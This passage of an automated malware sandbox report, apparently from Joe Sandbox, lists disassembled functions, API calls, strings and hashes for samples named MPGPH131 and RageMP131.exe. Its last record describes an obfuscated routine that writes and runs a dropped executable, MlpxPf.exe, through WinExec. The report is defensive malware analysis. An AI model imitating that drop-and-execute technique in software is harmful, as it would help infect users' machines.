Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 6c4163b1aff48035ea12062372814cc25d1ba616feb6ed2e1b83dc473e44c94a
Instruction ID: eb44711276c718821d91ad609700a5d3161983fa001d2db6998e0bf7a11bd024
Opcode Fuzzy Hash: 6c4163b1aff48035ea12062372814cc25d1ba616feb6ed2e1b83dc473e44c94a
Instruction Fuzzy Hash: B841C0719042199FCF12EF58D841BAEBBB4FB41314F1A421DE895AB391DB70AD00CBD1

Function 00835DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 008360F2
___std_exception_destroy.LIBVCRUNTIME ref: 0083617F
___std_exception_copy.LIBVCRUNTIME ref: 00836248

Strings

recursive_directory_iterator::operator++, xrefs: 008361CC

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 9e433ea44860e8704a97427bcb84d8f37d95a4bc1855ddc215f456440b9e67d0
Instruction ID: 6abc2432ae1aa8394e4f1908dde132cecd307a0d681bc790e2a7d9b386dd8c65
Opcode Fuzzy Hash: 9e433ea44860e8704a97427bcb84d8f37d95a4bc1855ddc215f456440b9e67d0
Instruction Fuzzy Hash: CEE1E2B19006089FCB28DF68D845B9EB7F9FF84700F14861DE456E7781EB74AA44CBA1

Function 008384C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 008386DE
___std_exception_destroy.LIBVCRUNTIME ref: 008386ED

Strings

at line , xrefs: 00838518
, column , xrefs: 00838555, 0083856B

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 80e264b21f34976b6bf6484267a8561e0e546724967965745aa5010f9c196d8c
Instruction ID: ecadccc9c029574b4aa03c6224bf2cc2ad88356f850395210eee04ce2f320956
Opcode Fuzzy Hash: 80e264b21f34976b6bf6484267a8561e0e546724967965745aa5010f9c196d8c
Instruction Fuzzy Hash: 98612771A002089FDB08DB68DC85BAEBBB5FF84314F148618F415E7792EB74AA8487D1

Function 008A34C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 008A3946
___std_exception_destroy.LIBVCRUNTIME ref: 008A395F
___std_exception_destroy.LIBVCRUNTIME ref: 008A3A97
___std_exception_destroy.LIBVCRUNTIME ref: 008A3AB0
___std_exception_destroy.LIBVCRUNTIME ref: 008A3C16
___std_exception_destroy.LIBVCRUNTIME ref: 008A3C2F
___std_exception_destroy.LIBVCRUNTIME ref: 008A4479
___std_exception_destroy.LIBVCRUNTIME ref: 008A4492

Strings

value, xrefs: 008A439F

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 67f0856ca8c4f0a9781fcac27f8960ee0119878b42d4432d1990ce2fd32381c8
Instruction ID: 608fd010909d0e36fff6e03786e85f6cbe4fadffd1502c0fd638d7a98cc45c84
Opcode Fuzzy Hash: 67f0856ca8c4f0a9781fcac27f8960ee0119878b42d4432d1990ce2fd32381c8
Instruction Fuzzy Hash: 1951D070C01258DFEF14DBA8CD85BDEBBB4BF46304F144258E055A7682D7746A88CB62

Function 00833B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00833C0F

Strings

ios_base::badbit set, xrefs: 00833BA7, 00833BD2, 00833BF3
ios_base::eofbit set, xrefs: 00833BB6
ios_base::failbit set, xrefs: 00833AC8, 00833BB1

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: ba723654d6c01babdfb7ddbcd5112f6d87b1deb18b30d5540261661d822906ec
Instruction ID: 69dbacdfd89e02f1a3e756a8d3ad0db787793b84228586769ec533d15876319d
Opcode Fuzzy Hash: ba723654d6c01babdfb7ddbcd5112f6d87b1deb18b30d5540261661d822906ec
Instruction Fuzzy Hash: ED1193B29007086BC710DE59D805B96B7E8EF85320F14892AFD58D7641F770A954CBD1

Function 008A2A60 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 008A2F43

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 15a8e40ab3b9a720bbc226ac1cd9138e596cb45eb4fd09cee6aaccd3d5ff5f5e
Instruction ID: 97c2cf56752f55eb0153d999ddb41ea8c71a43833ca59694411cbe95696e99a7
Opcode Fuzzy Hash: 15a8e40ab3b9a720bbc226ac1cd9138e596cb45eb4fd09cee6aaccd3d5ff5f5e
Instruction Fuzzy Hash: 28E1D171A002099FDB28DF6CC894A6DBBA1FF89310F148369E819DB795E730ED51CB90

Function 00838080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0083844D

Strings

ror, xrefs: 008380D4
parse error, xrefs: 00838149, 00838162

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 8865f9ca2000c68dc474f62161b402a8e263f8027221041d7aa81b5cbe19419e
Instruction ID: d3418e3e5ea75af765122dc639ca0fe3fa29b5bdb2028161d1030390b89fc7e3
Opcode Fuzzy Hash: 8865f9ca2000c68dc474f62161b402a8e263f8027221041d7aa81b5cbe19419e
Instruction Fuzzy Hash: 82C1E171910749DFDB08CF68CC85BADBB72FF95304F148248E404AB692DB74AA84CB91

Function 00837DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00838051
___std_exception_destroy.LIBVCRUNTIME ref: 00838060

Strings

[json.exception., xrefs: 00837E1C

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 11895a3bf62bd962d17445be7e7a22b3d6937293ef071da762782ce7f1710bff
Instruction ID: 1831bca9e01808b1a37b215b0365e21a095703352ce90d98bf2e7177d9c66ae6
Opcode Fuzzy Hash: 11895a3bf62bd962d17445be7e7a22b3d6937293ef071da762782ce7f1710bff
Instruction Fuzzy Hash: B89107719002089FDB18DF68CC95B9EBBB1FF85314F14425DF410AB692DBB4EA84C791

Function 00833A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00833C0F

Strings

ios_base::badbit set, xrefs: 00833BA7, 00833BD2, 00833BF3
ios_base::failbit set, xrefs: 00833AC8

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: ee13bcdeeac3d293a727f89d084407975a48309561f834178367d3d510bed3e3
Instruction ID: bf65cef557152a844086f357d429c37ed0becb8e2df247227c6f83ebe9463675
Opcode Fuzzy Hash: ee13bcdeeac3d293a727f89d084407975a48309561f834178367d3d510bed3e3
Instruction Fuzzy Hash: B141E2B1900608ABC714DF59C845BAAF7F8FF85720F14861AF954E7681E774AA408BE1

Function 008A45C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 008A4E29
___std_exception_destroy.LIBVCRUNTIME ref: 008A4E42
___std_exception_destroy.LIBVCRUNTIME ref: 008A594D
___std_exception_destroy.LIBVCRUNTIME ref: 008A5966

Strings

value, xrefs: 008A5873

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: ffedefc0a964181ccb1d98b4377fcdf068f25662779c19c377b641d801048940
Instruction ID: fea0bcf48620ad224774cd9c87744dc637ea19baed147d106c0b7e148078be55
Opcode Fuzzy Hash: ffedefc0a964181ccb1d98b4377fcdf068f25662779c19c377b641d801048940
Instruction Fuzzy Hash: EE51E2B0C00648DFEF14DFA4DC85BDEBBB4FF46304F184259E455AB682D7746A888B52

Function 008A99A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 008A99F1

Strings

type must be string, but is , xrefs: 008A9A58
type must be boolean, but is , xrefs: 008A9AE2

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 85336d12a36526499f48fb2b31c4dc688bfb4f36d62f0316d3282c46069c449c
Instruction ID: ebc93930da12e310e6cf2037c2ed1998ad3f802404b526dc2d2ad3eeb81ad4e8
Opcode Fuzzy Hash: 85336d12a36526499f48fb2b31c4dc688bfb4f36d62f0316d3282c46069c449c
Instruction Fuzzy Hash: FA316CB5904248EFDB14EBA8D842B9EB7A8FB44710F144669F415D7AC2EB34AA04C792

Analysis Process: RageMP131.exePID: 7572, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	250
Total number of Limit Nodes:	41

Executed Functions

Function 00F07044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00F07223
WriteFile.KERNELBASE(00000000,FFFFCD8F,00003E00,?,00000000), ref: 00F07252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00F07256
WinExec.KERNEL32(?,00000005), ref: 00F07262

Strings

athA, xrefs: 00F07199
GetM, xrefs: 00F070B6
odul, xrefs: 00F0722D
Clos, xrefs: 00F07129
catA, xrefs: 00F071AF
dleA, xrefs: 00F070D0
lstr, xrefs: 00F071A7
WinE, xrefs: 00F07110
GetT, xrefs: 00F07188
Writ, xrefs: 00F07148
el32, xrefs: 00F070FB
MlpxPf.exe, xrefs: 00F071FD, 00F07200
.dll, xrefs: 00F07102
Crea, xrefs: 00F07169
Kern, xrefs: 00F070F4

Memory Dump Source

Source File: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$MlpxPf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-650681566
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
